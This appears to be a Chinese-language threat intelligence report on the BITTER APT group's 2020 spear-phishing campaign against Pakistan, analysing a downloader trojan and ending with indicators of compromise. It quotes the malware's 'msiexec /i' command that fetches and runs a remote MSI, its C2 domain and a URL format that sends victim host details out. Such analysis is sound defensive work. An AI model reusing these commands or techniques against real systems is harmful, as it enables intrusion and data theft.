BITTER組織近期攻擊巴基斯坦活動分析

2021-02-16 廣東省網絡威脅情報中心

BITTER組織(又稱APT-C-08、T-APT-17、蔓靈花、苦象)是一個長期針對亞洲國家進行攻擊活動的APT組織,其還曾被發現對沙烏地阿拉伯進行攻擊,初期該組織的特碼數據包頭部常以「BITTER」作為標識,因此被命名為「BITTER」。BITTER組織主要針對軍工、政府、電力和核工業等敏感行業進行攻擊,從2019年起,該組織對我國相關進出口行業加強了攻擊,意圖竊取敏感資料。

  

  

近期,國內有關安全情報中心捕捉到BITTER組織針對巴基斯坦地區的相關攻擊樣本,本次捕獲的樣本是該組織一慣使用的下載樣本,通過魚叉攻擊來發送惡意模板注入docx文件,docx文件下載惡意漏洞模板並執行。例如「Guidelines for Extension of official-Gratis Passports.docx」(免費提供的官方護照延期指南.docx)

該漏洞模板文件是公式編輯器漏洞文件

 

可見下載的rgn文件編譯於2020.06.06 15:34:12,保存於c:\rgn\rgn.exe,該文件為該組織曾在過往攻擊活動中使用過的下載器變種木馬,詳見下圖:

 

在本次捕獲的攻擊活動中發現的另一例msi惡意文件,該樣本同樣利用docx模板注入技術來下載公式漏洞模板文件,將

「msiexec /i http://www.bheragreens.com/img/winsupdater.msi」執行命令寫入runonece註冊表,完成病毒下載執行

利用該惡意msi文件打包了惡意文件wnupdte.exe

 

提取其中的wnupdte.exe病毒文件,可見其編譯時間為2020年1月6日19:10:40,通過詳細分析可以推斷該病毒為ArtraDownloader v1變種,詳見下圖:

 

其存在一個對話框資源,被命名為「About ESET-Dwn」

 

通過對該病毒進行分析發現,其首先會從字符串資源中獲取窗體的窗口名稱(ESET-Dwn)和窗口類名(ESETDWN)

 

再通過獲取的名稱,來創建一個窗體

 

然後該病毒會對加密的字符串進行解密,有兩種解密方式,其中一種是直接加5,另一種是加上循環變量加1,其中C2解密為mia.alkhaleejpk.info

 

接著該病毒會檢測進程「winupdt」(檢測自身是否存在)及「avpui」(kaspersky相關文件)進程是否存在,若「winupdt」進程不存在,則拷貝自身到sendto目錄。

 

若「avpui」進程存在,則會通過設置註冊表啟動項用於駐留(「%tempf%」環境變量指向自身複製的文件),詳見下表:

 

 

若「avpui」進程不存在,則會在開始菜單目錄下放置winup.lnk快捷方式文件以駐留(lnk文件指向自身複製的文件winupdt.exe)。

 

接下來該病毒還會獲取受害機的基本信息,用戶名、主機名、作業系統名稱

 

再將信息按照以下格式進行拼接,採用$進行分割

http://mia.alkhaleejpk.info/PsehestyvuPw/F1l3estPhPInf1.php?info=Test$WIN-P01LA5VOT7J$admin$Windows7Ultimate-$-$WIN-P01LA5VOT7Jadmin

 

 

該病毒發起的相關get請求流量,將獲取的基本信息上傳到C2,詳見下圖:

 

創建信號量「error」

接下來該病毒會檢測返回數據,檢測是否存在下載執行任務,若存在下載執行任務,下載文件寫入並通過ShellExecuteA來執行下載的文件。

  

  

相關安全團隊通過對樣本C2的詳細分析,可見在2020年01月時,已有相關攻擊活動出現,本次發現的攻擊活動主要集中在2020年6月到2020年10月左右。

 

在同域名下存在另一個C2,mi.alkhaleejpk.info, 這兩個域名都解析到82.221.136.4

 

通過繼續分析C2,我們發現該地址疑似該組織的後臺管理地址,通過設置windows背景圖來隱藏登錄界面,這符合該組織近期的後臺變化情況:

 

該頁面登錄源碼詳見下圖:

 

詳細分析該病毒的文件,其被託管在bheragreens.com/img/winsupdater.msi

 

該網站是巴基斯坦私人住房協會相關的公司網站,主要負責一些基礎設施建設等,被入侵者用於託管惡意文件

 

liveways.pk是巴基斯坦相關的IT基礎架構解決方案和託管服務提供商,官網被入侵者用於託管惡意軟體

 

另外通過該下載器請求特徵和相關文件特徵,相關安全團隊確認該下載器為ArtradDownloader v1的變種,該變種的特徵一直在進行變化,通過分析,我們還發現了請求為info=ssss,使用『@』進行分割的變種文件

 

從該攻擊樣本提交區域和託管惡意文件網站處於巴基斯坦的相關情況進行分析,基本確定本次攻擊活動是BITTER組織在2020年6月到2020年10月對巴基斯坦進行的相關攻擊活動。

 

IOC

C2:

mi.alkhaleejpk.info

mia.alkhaleejpk.info

www.bheragreens.com/img/winsupdater.msi

http://liveways.pk/images/rgnd

http://liveways.pk/images/rgn

box.livevideosonlinepk.com

82.221.136.4

 

Hash:

f5b87d9800aeb64d92dafd758f1d642b (Guidelines for Extension of official-Gratis Passports.docx)

65be1e3712805bb0356f7e85c861f924 (rgnd)

808849de500179ec0fbc82c862f62333 (rgn、wnupdte.exe)

d30d19062bc6668e856946c63b6e9218 (winsupdater.msi)

df0cd6ac04f08a3c46546bc238dbacb1 (rt.msi)

761570587a2f92eea1512ff159ccef29 (rt.msi)

d3204365e948370998afdf6e903c7948 (e739.msi)

17e06d7e7789c6feaf41eb6be7885d62 (wnupdte.exe)

de6457c8bbb8e46154eec6b34d8d758a (wnupdte.exe)

72af5d72af656a593a6607554b7d25dd (wnupdte.exe)

5f63cc9905e26cfc18c14720ea02c158 (wnupdte.exe)

https://www.anquanke.com/post/id/214641

https://mp.weixin.qq.com/s/IcLGzGJYFx3dPUed0Bgv5w

https://mp.weixin.qq.com/s/TbiXJ359ZXOyQYWsfVDwGA

https://app.any.run/tasks/0751882a-3a21-48e7-bfeb-09c48deb649f/#

https://twitter.com/Timele9527/status/1280315854094123008

https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/

 

  

相關焦點

  • 蔓靈花(BITTER)APT組織使用InPage軟體漏洞針對巴基斯坦的攻擊及團夥關聯分析
    概述近期,360威脅情報中心監控到一系列針對巴基斯坦地區的定向攻擊活動,而相關的惡意程序主要利用包含了
  • 印度黑客組織近期網絡攻擊活動及洩露武器分析
    2012年以來,安天針對印度方向的網絡攻擊進行了持續的跟蹤與分析,追蹤其攻擊行動、溯源其幕後團夥,多年以來持續曝光相關攻擊活動,震懾印方攻擊組織。本次報告涉及的攻擊組織,安天在2017年「潛伏的象群」報告中曾披露過其苦酒行動,其他廠商也稱為:BITTER、蔓靈花、APT-C-17、T-APT-04等,根據安天的「攻擊組織中文命名規範」,結合其網絡攻擊活動和地緣政治特點,安天正式將該組織命名為「苦象」。
  • 疑似BITTER組織利用LNK文件的攻擊活動分析
    該組織主要針對周邊國家地區的政府,軍工業,電力,核等單位進行攻擊,以竊取敏感資料為目的,具有強烈的政治背景。近期,奇安信威脅情報中心紅雨滴團隊在日常高價值樣本挖掘中,捕獲了BITTER組織多個攻擊樣本,在此次攻擊活動中,BITTER組織首次利用LNK文件作為攻擊入口,從遠程獲取MSI文件執行,最終釋放執行.NET惡意軟體竊取受害者機器敏感信息。
  • 蔓靈花(BITTER)APT組織針對中國境內政府、軍工、核能等敏感機構的最新攻擊活動報告
    騰訊御見威脅中心在今年五月份捕捉到了疑似該組織對我國境內敏感單位的攻擊活動,但是由於當時無法下載到具體的攻擊模塊,因此無法進行進一步的關聯和分析。而在10月底,騰訊御見威脅情報中心再次捕捉到了疑似該組織對我國的軍工業、核能、政府等重點單位的攻擊,並且獲取到了完整的攻擊武器庫,經過進一步的關聯分析,我們確認該攻擊組織就是2016年曝光的蔓靈花。
  • 蔓靈花(BITTER)APT組織針對中國境內軍工、核能、政府等敏感機構的最新攻擊活動報告
    組織是一個長期針對中國、巴基斯坦等國家進行攻擊活動的APT組織,該APT組織為目前活躍的針對境內目標進行攻擊的境外APT組織之一。騰訊御見威脅中心在今年五月份捕捉到了疑似該組織對我國境內敏感單位的攻擊活動,但是由於當時無法下載到具體的攻擊模塊,因此無法進行進一步的關聯和分析。而在10月底,騰訊御見威脅情報中心再次捕捉到了疑似該組織對我國的軍工業、核能、政府等重點單位的攻擊,並且獲取到了完整的攻擊武器庫,經過進一步的關聯分析,我們確認該攻擊組織就是2016年曝光的蔓靈花。
  • 疑似白象組織針對巴基斯坦、孟加拉國等南亞國家的最新攻擊活動報告
    除了巴基斯坦的目標外,我們還發現疑似有孟加拉國某組織的高級技術管理人員也被進行了攻擊。經過關聯分析,該次攻擊疑似白象組織所為。而有意思的是,經過對基礎設施的關聯分析,我們還發現某次攻擊,而該攻擊活動又可以關聯到BITTER(蔓靈花)組織。
  • Donot(APT-C-35)組織對在華巴基斯坦商務人士的定向攻擊活動分析
    背景近期,360威脅情報中心協助用戶處理了多起非常有針對性的郵件釣魚攻擊事件,被攻擊目標包括中國境內的巴基斯坦重要商務人士
  • 疑似中國臺灣方向相關組織近期攻擊活動分析
    近日,國內有關安全情報中心監測到一些偽裝文檔的攻擊樣本,發現的樣本偽裝內容多為「檢察院裁決書」、「臺資交帳」等,以開源AsyncRAT
  • 近期雙尾蠍APT組織利用偽造社交軟體等針對多平臺的攻擊活動分析
    該組織長期針對中東地區,最早於2017年被披露,至少從2016年5月起,持續針對巴勒斯坦軍事機構、教育機構等重要領域開展了有組織,有計劃,有針對性的攻擊。近期,國內有關安全研究團隊在日常的威脅狩獵中捕獲了該組織多起攻擊樣本,涉及Windows和Android雙平臺。
  • 疑似「海蓮花」組織早期針對國內高校的攻擊活動分析
    漏洞文檔,通過對該漏洞文檔及相關攻擊活動的分析,我們關聯到該組織近期針對南亞國家的攻擊活動。並且發現了疑似「海蓮花」組織在2017年5月初針對國內實施的一次集中式的攻擊活動,結合內部的威脅情報數據,我們認為這是該組織利用「永恆之藍」漏洞實施的一輪重點針對國內高校的攻擊活動。本報告將詳細分析「海蓮花」組織新的攻擊活動中利用的攻擊技術細節,並披露其在2017年5月實施的攻擊行動詳情,以及其中的關聯性。
  • 「蔓靈花」攻擊巴基斯坦使用的惡意下載器技術分析
    摘要2015 年以來,「蔓靈花」APT組織一直在使用未被曝光的下載器的變體攻擊巴基斯坦和中國的相關機構
  • 響尾蛇組織利用巴菲雙邊協議為誘餌的攻擊活動分析
    概述響尾蛇(又稱SideWinder)是疑似具有南亞背景的APT組織,其攻擊活動最早可追溯到2012年,主要針對其周邊國家政府
  • 疑似白象APT組織最新攻擊武器分析
    據了解,該組織主要的攻擊範圍為中國、巴基斯坦等亞洲地區的國家,其目的主要是竊取敏感信息。其最早的攻擊活動還要追溯到2009年11月。在歷來針對中國地區的攻擊中,主要針對政府機構、科研教育領域開展攻擊,尤其以科研教育領域為主。
  • Hermit(隱士)APT組織2020年最新攻擊活動分析
    ,並且根據關聯分析確定跟KONNI為同一組織所為。該組織的攻擊對象包括與朝鮮半島相關的非政府組織、政府部門、貿易公司、新聞媒體等。SYSCON/SANNY木馬是一個非常有特色的遠程控制木馬,通過ftp協議來進行C&C控制,該後門的主要攻擊目標為朝鮮半島相關的重要政治人物或者要害部門,偶爾也會針對東南亞等國進行攻擊。該活動自2017年下半年開始活躍,並且對多個目標進行了攻擊活動。被曝光後,該組織活動沒有任何減弱的跡象。
  • 瑞星網絡攻擊報告:黑客組織TA505近期網絡攻擊分析
    瑞星安全專家通過對攻擊者所使用的數字籤名、技術手法、命名風格等行為進行分析,發現此攻擊事件是知名網絡攻擊組織「TA505」所為。TA505是國外安全公司Proofpoint研究團隊最早披露並命名的一個活動非常頻繁的網絡犯罪組織,根據目前收集到的數據,2014年該組織分發了上百次Dridex惡意銀行木馬,2016年和2017年的進行大規模Locky木馬攻擊活動,而且其中的很多攻擊活動涉及到了全世界數以億計的惡意消息。2018年開始投遞FlawedAmmyy木馬,針對銀行、金融機構、工商業進行定向攻擊。
  • 【黑客攻擊】俄羅斯黑客組織Gamaredon的攻擊活動分析
    該組織不以破壞或獲利為主要目的,旨在竊取目標的敏感信息。Gamaredon是最為活躍的APT組織之一,與傳統的APT攻擊模式不同的是,該組織在攻擊活動中使用了大量的基礎的域名,這種TTP在網絡犯罪團夥中較為常見。近年來,該組織的攻擊活動雖然被多次暴露,但其並沒有停止攻擊的步伐,依然動作頻頻。
  • 「靈貓」組織針對中東地區的攻擊活動分析報告
    「靈貓」組織(又名Moonlight、Molerats、Gaza Hackers Team、Gaza Cybergang)是一個來自加沙地區的APT攻擊組織,其最早的攻擊活動時間可追溯至2012年。國外安全廠商ClearSky曾在2016年所發的「Operation DustySky」報告[1]中指出該組織的背後為哈馬斯(伊斯蘭抵抗運動組織的簡稱)。
  • 遊蕩於中巴兩國的魅影——響尾蛇(SideWinder) APT組織針對巴基斯坦最近的活動以及2019年該組織的活動總結
    )組織針對巴基斯坦的活動,介於該組織主要針對巴基斯坦和中國以及其他東南亞國家,且其於10月份時候針對中國部分國防重要行業進行類似手法的攻擊活動,為了更好了解對手的攻擊手段以及加以防範,團隊將以最近的樣本為契機來總結該組織為期一年的攻擊活動.
  • 南亞APT組織"蔓靈花"歷史攻擊活動分析
    概述BITTER又名蔓靈花、APT-C-08,疑似來自南亞地區,主要攻擊目標為巴基斯坦和中國該組織最早在2016由美國安全公司Forcepoint進行了披露,並且命名為「BITTER」,同年360也跟進發布了分析報告,命名為「蔓靈花」。
  • 「Higaisa(黑格莎)」組織近期攻擊活動報告
    ,在這輪攻擊中,該組織捨棄了使用多年的dropper,完全重寫了攻擊誘餌dropper,此外還引入了dll側加載(白加黑)技術對抗安全軟體的檢測和查殺。「Higaisa(黑格莎)」組織是騰訊安全2019年披露的一個來自朝鮮半島的專業APT組織,因為其常用higaisa作為加密密碼而得名。該組織具有政府背景,其活動至少可以追溯到2016年,且一直持續活躍到現在。該組織常利用節假日、朝鮮國慶等朝鮮重要時間節點來進行釣魚活動,誘餌內容包括新年祝福、元宵祝福、朝鮮國慶祝福,以及重要新聞、海外人員聯繫錄等等。